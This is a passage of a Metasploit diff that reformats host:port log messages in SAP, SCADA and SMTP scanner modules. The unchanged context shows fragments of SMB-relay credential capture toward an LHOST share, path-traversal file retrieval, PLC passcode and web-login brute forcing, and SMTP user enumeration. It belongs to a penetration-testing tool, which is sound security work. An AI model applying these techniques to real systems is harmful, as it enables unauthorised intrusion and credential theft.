       env = res.body.scan(%r{<item>([^<]+)</item>}i)
-      print_good("#{rhost}:#{rport} [SAP] List of Config Files")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] List of Config Files")
       env.each do |output|
         print_good(output.first)
       end
       return
     end
 
-    print_error("#{rhost}:#{rport} [SAP] Failed to identify instance properties")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Failed to identify instance properties")
   rescue ::Rex::ConnectionError
-    print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def listfiles(rhost)
-    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
+    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -110,12 +110,12 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to attempt authentication")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to attempt authentication")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] #{datastore['FILETYPE'].downcase}: #{env.length} entries extracted")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] #{datastore['FILETYPE'].downcase}: #{env.length} entries extracted")
 
       saptbl = Msf::Ui::Console::Table.new(
         Msf::Ui::Console::Table::Style::Default,
@@ -148,10 +148,10 @@ class MetasploitModule < Msf::Auxiliary
       print_line(saptbl.to_s)
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
 
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to request environment")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to request environment")
     end
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def get_start_profile(rhost)
-    print_status("#{rhost}:#{rport} [SAP] Connecting to SAP Management Console SOAP Interface")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Connecting to SAP Management Console SOAP Interface")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -113,12 +113,12 @@ class MetasploitModule < Msf::Auxiliary
 
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
     if success
-      print_good("#{rhost}:#{rport} [SAP] Startup Profile Extracted: #{name}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Startup Profile Extracted: #{name}")
       f = store_loot(
         'sap.profile',
         'text/xml',
@@ -134,10 +134,10 @@ class MetasploitModule < Msf::Auxiliary
       end
 
     elsif fault
-      print_error("#{rhost}:#{rport} [SAP] Error code: #{faultcode}")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Error code: #{faultcode}")
       return
     else
-      print_error("#{rhost}:#{rport} [SAP] failed to request environment")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] failed to request environment")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb
+++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Auxiliary
     }, 25)
 
     if !res
-      print_error("#{rhost}:#{rport} [SAP] Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} [SAP] Unable to connect")
       return
     end
 
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def enum_version(rhost)
-    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{rhost}:#{rport}")
+    print_status("[SAP] Connecting to SAP Management Console SOAP Interface on #{Rex::Socket.to_authority(rhost, rport)}")
     success = false
     soapenv = 'http://schemas.xmlsoap.org/soap/envelope/'
     xsi = 'http://www.w3.org/2001/XMLSchema-instance'
@@ -109,7 +109,7 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if success
-      print_good("[SAP] Version Number Extracted - #{rhost}:#{rport}")
+      print_good("[SAP] Version Number Extracted - #{Rex::Socket.to_authority(rhost, rport)}")
       print_good("[SAP] Version: #{version}")
       print_good("[SAP] SID: #{sapsid.upcase}")
 

--- a/modules/auxiliary/scanner/sap/sap_router_portscanner.rb
+++ b/modules/auxiliary/scanner/sap/sap_router_portscanner.rb
@@ -367,7 +367,7 @@ class MetasploitModule < Msf::Auxiliary
             r << res
           end
         rescue ::Rex::ConnectionRefused
-          print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{rhost}:#{rport} - Connection Refused")
+          print_error("#{ip}:#{port} - Unable to connect to SAPRouter #{Rex::Socket.to_authority(rhost, rport)} - Connection Refused")
         rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error => e
           vprint_error(e.message)
         rescue ::Rex::Post::Meterpreter::RequestError => e

--- a/modules/auxiliary/scanner/sap/sap_smb_relay.rb
+++ b/modules/auxiliary/scanner/sap/sap_smb_relay.rb
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def run_xmla
     if !valid_credentials?
-      vprint_error("#{rhost}:#{rport} - Credentials needed in order to abuse the SAP BW service")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Credentials needed in order to abuse the SAP BW service")
       return
     end
 
@@ -95,7 +95,7 @@ class MetasploitModule < Msf::Auxiliary
     data << '<in>&foo;</in>'
 
     begin
-      print_status("#{rhost}:#{rport} - Sending request for #{smb_uri}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request for #{smb_uri}")
       res = send_request_raw({
         'uri' => '/sap/bw/xml/soap/xmla?sap-client=' + datastore['CLIENT'] + '&sap-language=EN',
         'method' => 'POST',
@@ -105,12 +105,12 @@ class MetasploitModule < Msf::Auxiliary
         'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT']
       })
       if res && (res.code == 200) && res.body =~ /XML for Analysis Provider/ && res.body =~ /Request transfered is not a valid XML/
-        print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SMB Relay looks successful, check your SMB capture machine")
       elsif res
-        vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Response: #{res.code} - #{res.message}")
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
   end
@@ -119,7 +119,7 @@ class MetasploitModule < Msf::Auxiliary
     smb_uri = "\\\\#{datastore['LHOST']}\\#{Rex::Text.rand_text_alpha_lower(7)}.#{Rex::Text.rand_text_alpha_lower(3)}"
 
     if datastore['HttpUsername'].empty?
-      vprint_status("#{rhost}:#{rport} - Sending unauthenticated request for #{smb_uri}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending unauthenticated request for #{smb_uri}")
       res = send_request_cgi({
         'uri' => '/mmr/MMR',
         'method' => 'HEAD',
@@ -133,7 +133,7 @@ class MetasploitModule < Msf::Auxiliary
       })
 
     else
-      vprint_status("#{rhost}:#{rport} - Sending authenticated request for #{smb_uri}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending authenticated request for #{smb_uri}")
       res = send_request_cgi({
         'uri' => '/mmr/MMR',
         'method' => 'GET',
@@ -149,21 +149,21 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if res
-      vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Response: #{res.code} - #{res.message}")
     end
   rescue ::Rex::ConnectionError
-    print_error("#{rhost}:#{rport} - Unable to connect")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
     return
   end
 
   def send_soap_rfc_request(data, smb_uri)
     if !valid_credentials?
-      vprint_error("#{rhost}:#{rport} - Credentials needed in order to abuse the SAP SOAP RFC service")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Credentials needed in order to abuse the SAP SOAP RFC service")
       return
     end
 
     begin
-      vprint_status("#{rhost}:#{rport} - Sending request for #{smb_uri}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request for #{smb_uri}")
       res = send_request_cgi({
         'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
@@ -180,12 +180,12 @@ class MetasploitModule < Msf::Auxiliary
         }
       })
       if res && (res.code == 500) && res.body =~ /OPEN_FAILURE/
-        print_good("#{rhost}:#{rport} - SMB Relay looks successful, check your SMB capture machine")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - SMB Relay looks successful, check your SMB capture machine")
       elsif res
-        vprint_status("#{rhost}:#{rport} - Response: #{res.code} - #{res.message}")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Response: #{res.code} - #{res.message}")
       end
     rescue ::Rex::ConnectionError
-      print_error("#{rhost}:#{rport} - Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_eps_get_directory_listing.rb
@@ -71,7 +71,7 @@ class MetasploitModule < Msf::Auxiliary
     data << '</SOAP-ENV:Envelope>'
 
     begin
-      vprint_status("#{rhost}:#{rport} - Sending request to check #{datastore['DIR']}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request to check #{datastore['DIR']}")
       res = send_request_cgi({
         'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
@@ -89,14 +89,14 @@ class MetasploitModule < Msf::Auxiliary
       })
       if res && (res.code == 200) && res.body =~ /EPS_GET_DIRECTORY_LISTING\.Response/ && res.body =~ %r{<FILE_COUNTER>(\d*)</FILE_COUNTER>}
         file_count = ::Regexp.last_match(1)
-        print_good("#{rhost}:#{rport} - #{file_count} files under #{datastore['DIR']}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - #{file_count} files under #{datastore['DIR']}")
       else
-        vprint_error("#{rhost}:#{rport} - Error code: " + res.code.to_s) if res
-        vprint_error("#{rhost}:#{rport} - Error message: " + res.message.to_s) if res
-        vprint_error("#{rhost}:#{rport} - Error body: " + res.body.to_s) if res && res.body
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error code: " + res.code.to_s) if res
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error message: " + res.message.to_s) if res
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Error body: " + res.body.to_s) if res && res.body
       end
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Unable to connect")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_pfl_check_os_file_existence.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
     data << '</SOAP-ENV:Body>'
     data << '</SOAP-ENV:Envelope>'
     begin
-      vprint_status("#{rhost}:#{rport} - Sending request to check #{datastore['FILEPATH']}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request to check #{datastore['FILEPATH']}")
       res = send_request_cgi({
         'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
@@ -91,17 +91,17 @@ class MetasploitModule < Msf::Auxiliary
       })
       if res && (res.code == 200) && res.body =~ /PFL_CHECK_OS_FILE_EXISTENCE\.Response/
         if res.body =~ %r{<FILE_EXISTS>X</FILE_EXISTS>}
-          print_good("#{rhost}:#{rport} - File #{datastore['FILEPATH']} exists")
+          print_good("#{Rex::Socket.to_authority(rhost, rport)} - File #{datastore['FILEPATH']} exists")
         else
-          print_warning("#{rhost}:#{rport} - File #{datastore['FILEPATH']} DOESN'T exist")
+          print_warning("#{Rex::Socket.to_authority(rhost, rport)} - File #{datastore['FILEPATH']} DOESN'T exist")
         end
       elsif res
-        vprint_error("#{rhost}:#{rport} - Response code: " + res.code.to_s)
-        vprint_error("#{rhost}:#{rport} - Response message: " + res.message.to_s)
-        vprint_error("#{rhost}:#{rport} - Response body: " + res.body.to_s) if res.body
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Response code: " + res.code.to_s)
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Response message: " + res.message.to_s)
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Response body: " + res.body.to_s) if res.body
       end
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Unable to connect")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_rzl_read_dir.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Auxiliary
     data << '</SOAP-ENV:Envelope>'
 
     begin
-      vprint_status("#{rhost}:#{rport} - Sending request to enumerate #{datastore['DIR']}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Sending request to enumerate #{datastore['DIR']}")
       res = send_request_cgi({
         'uri' => '/sap/bc/soap/rfc',
         'method' => 'POST',
@@ -116,13 +116,13 @@ class MetasploitModule < Msf::Auxiliary
       if res && (res.code == 200) && res.body =~ /rfc:RZL_READ_DIR_LOCAL.Response/
         files = parse_xml(res.body)
         path = store_loot('sap.soap.rfc.dir', 'text/xml', rhost, res.body, datastore['DIR'])
-        print_good("#{rhost}:#{rport} - #{datastore['DIR']} successfully enumerated, results stored on #{path}")
+        print_good("#{Rex::Socket.to_authority(rhost, rport)} - #{datastore['DIR']} successfully enumerated, results stored on #{path}")
         files.each do |f|
           vprint_line("Entry: #{f['name']}, Size: #{f['size'].to_i}")
         end
       end
     rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Unable to connect")
+      vprint_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
   end

--- a/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
+++ b/modules/auxiliary/scanner/sap/sap_soap_rfc_susr_rfc_user_interface.rb
@@ -104,6 +104,6 @@ class MetasploitModule < Msf::Auxiliary
     end
     return
   rescue ::Rex::ConnectionError
-    vprint_error("[SAP] #{rhost}:#{rport} - Unable to connect")
+    vprint_error("[SAP] #{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
   end
 end

--- a/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb
+++ b/modules/auxiliary/scanner/sap/sap_web_gui_brute_login.rb
@@ -160,7 +160,7 @@ class MetasploitModule < Msf::Auxiliary
         }
       })
     rescue ::Rex::ConnectionError, Errno::ECONNREFUSED, Errno::ETIMEDOUT
-      print_error("[SAP] #{rhost}:#{rport} - Service failed to respond")
+      print_error("[SAP] #{Rex::Socket.to_authority(rhost, rport)} - Service failed to respond")
       return false
     end
 
@@ -188,11 +188,11 @@ class MetasploitModule < Msf::Auxiliary
         )
         return true
       elsif res.body =~ /Password logon no longer possible - too many failed attempts/
-        print_error("[SAP] #{rhost}:#{rport} - #{user} locked in client #{cli}")
+        print_error("[SAP] #{Rex::Socket.to_authority(rhost, rport)} - #{user} locked in client #{cli}")
         return false
       end
     else
-      print_error("[SAP] #{rhost}:#{rport} - error trying #{user}/#{pass} against client #{cli}")
+      print_error("[SAP] #{Rex::Socket.to_authority(rhost, rport)} - error trying #{user}/#{pass} against client #{cli}")
       return false
     end
   end

--- a/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb
+++ b/modules/auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     if not res
-      print_error("#{rhost}:#{rport} - Unable to connect")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - Unable to connect")
       return
     end
 
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Auxiliary
       rfile = datastore['RFILE']
     end
 
-    print_status("#{rhost}:#{rport} - Checking if file exists...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Checking if file exists...")
 
     res = send_request_cgi({
       'uri' => "/#{traversal}#{rfile}",
@@ -72,13 +72,13 @@ class MetasploitModule < Msf::Auxiliary
     })
 
     if res and res.code == 200 and res.message =~ /File Exists/
-      print_good("#{rhost}:#{rport} - The file exists")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - The file exists")
     else
-      print_error("#{rhost}:#{rport} - The file doesn't exist")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} - The file doesn't exist")
       return
     end
 
-    print_status("#{rhost}:#{rport} - Retrieving remote file...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - Retrieving remote file...")
 
     res = send_request_cgi({
       'uri' => "/#{traversal}#{rfile}",
@@ -88,15 +88,15 @@ class MetasploitModule < Msf::Auxiliary
     if res and res.code == 200 and res.message =~ /Sending file/
       loot = res.body
       if not loot or loot.empty?
-        print_status("#{rhost}:#{rport} - Retrieved empty file")
+        print_status("#{Rex::Socket.to_authority(rhost, rport)} - Retrieved empty file")
         return
       end
       f = ::File.basename(datastore['RFILE'])
       path = store_loot('indusoft.webstudio.file', 'application/octet-stream', rhost, loot, f, datastore['RFILE'])
-      print_good("#{rhost}:#{rport} - #{datastore['RFILE']} saved in #{path}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - #{datastore['RFILE']} saved in #{path}")
       return
     end
 
-    print_error("#{rhost}:#{rport} - Failed to retrieve file")
+    print_error("#{Rex::Socket.to_authority(rhost, rport)} - Failed to retrieve file")
   end
 end

--- a/modules/auxiliary/scanner/scada/koyo_login.rb
+++ b/modules/auxiliary/scanner/scada/koyo_login.rb
@@ -87,14 +87,14 @@ class MetasploitModule < Msf::Auxiliary
     )
     add_socket(@udp_sock)
 
-    print_status("#{rhost}:#{rport} - KOYO - Checking the controller for locked memory...")
+    print_status("#{Rex::Socket.to_authority(rhost, rport)} - KOYO - Checking the controller for locked memory...")
 
     if unlock_check
       # TODO: Report a vulnerability for an unlocked controller?
-      print_good("#{rhost}:#{rport} - Unlocked!")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} - Unlocked!")
       return
     else
-      print_status("#{rhost}:#{rport} - KOYO - Controller locked; commencing bruteforce...")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} - KOYO - Controller locked; commencing bruteforce...")
     end
 
     # TODO: Consider sort_by {rand} in order to avoid sequential guessing
@@ -102,13 +102,13 @@ class MetasploitModule < Msf::Auxiliary
 
     (0..9999999).each do |i|
       passcode = datastore['PREFIX'] + i.to_s.rjust(7, '0')
-      vprint_status("#{rhost}:#{rport} - KOYO - Trying #{passcode}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - KOYO - Trying #{passcode}")
       bytes = passcode.scan(/../).map { |x| x.to_i(16) }
       passstr = bytes.pack("C*")
       res = try_auth(passstr)
       next if not res
 
-      print_good "#{rhost}:#{rport} - KOYO - Found passcode: #{passcode}"
+      print_good "#{Rex::Socket.to_authority(rhost, rport)} - KOYO - Found passcode: #{passcode}"
       report_cred(
         ip: rhost,
         port: rport.to_i,

--- a/modules/auxiliary/scanner/smtp/smtp_enum.rb
+++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Auxiliary
     rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
       return result, code
     rescue ::Exception => e
-      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Error smtp_send: '#{e.class}' '#{e}'")
       return nil, 0
     end
   end
@@ -80,15 +80,15 @@ class MetasploitModule < Msf::Auxiliary
     result, code = smtp_send(cmd)
 
     if (not result)
-      print_error("#{rhost}:#{rport} Connection but no data...skipping")
+      print_error("#{Rex::Socket.to_authority(rhost, rport)} Connection but no data...skipping")
       return
     end
     banner.chomp! if (banner)
     if (banner =~ /microsoft/i and datastore['UNIXONLY'])
-      print_status("#{rhost}:#{rport} Skipping microsoft (#{banner})")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Skipping microsoft (#{banner})")
       return
     elsif (banner)
-      print_status("#{rhost}:#{rport} Banner: #{banner}")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} Banner: #{banner}")
     end
 
     domain = result.split()[1]
@@ -114,7 +114,7 @@ class MetasploitModule < Msf::Auxiliary
         user = Rex::Text.rand_text_alpha(8)
         result, code = smtp_send("RCPT TO: #{user}\@#{domain}\r\n")
         if (code >= 250 and code <= 259)
-          vprint_status("#{rhost}:#{rport} RCPT TO: Allowed for random user (#{user})...not reliable? #{code} '#{result}'")
+          vprint_status("#{Rex::Socket.to_authority(rhost, rport)} RCPT TO: Allowed for random user (#{user})...not reliable? #{code} '#{result}'")
           rcpt = false
         else
           smtp_send("RSET\r\n")
@@ -126,19 +126,19 @@ class MetasploitModule < Msf::Auxiliary
     end
 
     if (not vrfy and not expn and not rcpt)
-      print_status("#{rhost}:#{rport} could not be enumerated (no EXPN, no VRFY, invalid RCPT)")
+      print_status("#{Rex::Socket.to_authority(rhost, rport)} could not be enumerated (no EXPN, no VRFY, invalid RCPT)")
       return
     end
     finish_host(users_found)
     disconnect
   rescue Rex::ConnectionError, Errno::ECONNRESET, Rex::ConnectionTimeout, EOFError, Errno::ENOPROTOOPT
   rescue ::Exception => e
-    print_error("Error: #{rhost}:#{rport} '#{e.class}' '#{e}'")
+    print_error("Error: #{Rex::Socket.to_authority(rhost, rport)} '#{e.class}' '#{e}'")
   end
 
   def finish_host(users_found)
     if users_found and not users_found.empty?
-      print_good("#{rhost}:#{rport} Users found: #{users_found.sort.join(", ")}")
+      print_good("#{Rex::Socket.to_authority(rhost, rport)} Users found: #{users_found.sort.join(", ")}")
       report_note(
         :host => rhost,
         :port => rport,
@@ -149,14 +149,14 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def kiss_and_make_up(cmd)
-    vprint_status("#{rhost}:#{rport} SMTP server annoyed...reconnecting and saying HELO again...")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} SMTP server annoyed...reconnecting and saying HELO again...")
     disconnect
     connect
     smtp_send("HELO localhost\r\n")
     result, code = smtp_send("#{cmd}")
     result.chomp!
     cmd.chomp!
-    vprint_status("#{rhost}:#{rport} - SMTP - Re-trying #{cmd} received #{code} '#{result}'")
+    vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - SMTP - Re-trying #{cmd} received #{code} '#{result}'")
     return result, code
   end
 
@@ -166,10 +166,10 @@ class MetasploitModule < Msf::Auxiliary
       next if user.downcase == 'root'
 
       result, code = smtp_send("#{cmd} #{user}\r\n")
-      vprint_status("#{rhost}:#{rport} - SMTP - Trying #{cmd} #{user} received #{code} '#{result}'")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - SMTP - Trying #{cmd} #{user} received #{code} '#{result}'")
       result, code = kiss_and_make_up("#{cmd} #{user}\r\n") if (code == 0 and result.to_s == '')
       if (code == 250)
-        vprint_status("#{rhost}:#{rport} - Found user: #{user}")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Found user: #{user}")
         users.push(user)
       end
     }
@@ -181,7 +181,7 @@ class MetasploitModule < Msf::Auxiliary
     usernames.each { |user|
       next if user.downcase == 'root'
 
-      vprint_status("#{rhost}:#{rport} - SMTP - Trying MAIL FROM: root\@#{domain} / RCPT TO: #{user}...")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - SMTP - Trying MAIL FROM: root\@#{domain} / RCPT TO: #{user}...")
       result, code = smtp_send("MAIL FROM: root\@#{domain}\r\n")
       result, code = kiss_and_make_up("MAIL FROM: root\@#{domain}\r\n") if (code == 0 and result.to_s == '')
 
@@ -193,11 +193,11 @@ class MetasploitModule < Msf::Auxiliary
         end
 
         if (code == 250)
-          vprint_status("#{rhost}:#{rport} - Found user: #{user}")
+          vprint_status("#{Rex::Socket.to_authority(rhost, rport)} - Found user: #{user}")
           users.push(user)
         end
       else
-        vprint_status("#{rhost}:#{rport} MAIL FROM: #{user} NOT allowed during brute...aborting ( '#{code}' '#{result}')")
+        vprint_status("#{Rex::Socket.to_authority(rhost, rport)} MAIL FROM: #{user} NOT allowed during brute...aborting ( '#{code}' '#{result}')")
         break
       end
       smtp_send("RSET\r\n")

--- a/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb
+++ b/modules/auxiliary/scanner/smtp/smtp_ntlm_domain.rb
@@ -33,11 +33,11 @@ class MetasploitModule < Msf::Auxiliary
       connect
 
       unless banner
-        vprint_error("#{rhost}:#{rport} No banner received, aborting...")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} No banner received, aborting...")
         return
       end
 
-      vprint_status("#{rhost}:#{rport} Connected: #{banner.strip.inspect}")
+      vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Connected: #{banner.strip.inspect}")
 
       # Report the last line of the banner as services information (typically the interesting one)
       report_service(host: rhost, port: rport, name: 'smtp', proto: 'tcp', info: banner.strip.split("\n").last)
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Auxiliary
       # Find all NTLM references in the EHLO response
       exts = sock.get_once.to_s.split(/\n/).grep(/NTLM/)
       if exts.length == 0
-        vprint_error("#{rhost}:#{rport} No NTLM extensions found")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} No NTLM extensions found")
         return
       end
 
@@ -59,16 +59,16 @@ class MetasploitModule < Msf::Auxiliary
         # Try the usual AUTH NTLM approach if possible, otherwise echo the extension back to server
         if e =~ /AUTH.*NTLM/
           sock.puts("AUTH NTLM\r\n")
-          vprint_status("#{rhost}:#{rport} Sending AUTH NTLM")
+          vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Sending AUTH NTLM")
         else
           sock.puts(e + "\r\n")
-          vprint_status("#{rhost}:#{rport} Sending #{e}")
+          vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Sending #{e}")
         end
 
         # We expect a "334" code to go ahead with NTLM auth
         reply = sock.get_once.to_s
         if reply !~ /^334\s+/m
-          vprint_status("#{rhost}:#{rport} Expected a 334 response, received #{reply.strip.inspect} aborting...")
+          vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Expected a 334 response, received #{reply.strip.inspect} aborting...")
           break
         else
           # Send the NTLM AUTH blob to tell the server we're ready to auth
@@ -79,7 +79,7 @@ class MetasploitModule < Msf::Auxiliary
           challenge = sock.get_once.to_s.split(/\s+/).last
 
           if challenge.length == 0
-            vprint_status("#{rhost}:#{rport} Empty challenge response, aborting...")
+            vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Empty challenge response, aborting...")
             break
           end
 
@@ -87,29 +87,29 @@ class MetasploitModule < Msf::Auxiliary
             # Extract the domain out of the NTLM response
             ntlm_reply = Rex::Proto::NTLM::Message.parse(Rex::Text.decode_base64(challenge))
             if !ntlm_reply && ntlm_reply.has_key?(:target_name)
-              vprint_status("#{rhost}:#{rport} Invalid challenge response, aborting...")
+              vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Invalid challenge response, aborting...")
               break
             end
 
             # TODO: Extract the server name from :target_info as well
             domain = ntlm_reply[:target_name].value.to_s.gsub(/\x00/, '')
             if domain.to_s.length == 0
-              vprint_status("#{rhost}:#{rport} Invalid target name in challenge response, aborting...")
+              vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Invalid target name in challenge response, aborting...")
               break
             end
 
-            print_good("#{rhost}:#{rport} Domain: #{domain}")
+            print_good("#{Rex::Socket.to_authority(rhost, rport)} Domain: #{domain}")
             report_note(host: rhost, port: rport, proto: 'tcp', type: 'smtp.ntlm_auth_info', data: { domain: domain })
             break
           rescue ::Rex::ArgumentError
-            vprint_status("#{rhost}:#{rport} Invalid challenge response message, aborting...")
+            vprint_status("#{Rex::Socket.to_authority(rhost, rport)} Invalid challenge response message, aborting...")
             break
           end
         end
       end
 
       if !domain
-        vprint_error("#{rhost}:#{rport} No NTLM domain found")
+        vprint_error("#{Rex::Socket.to_authority(rhost, rport)} No NTLM domain found")
       end
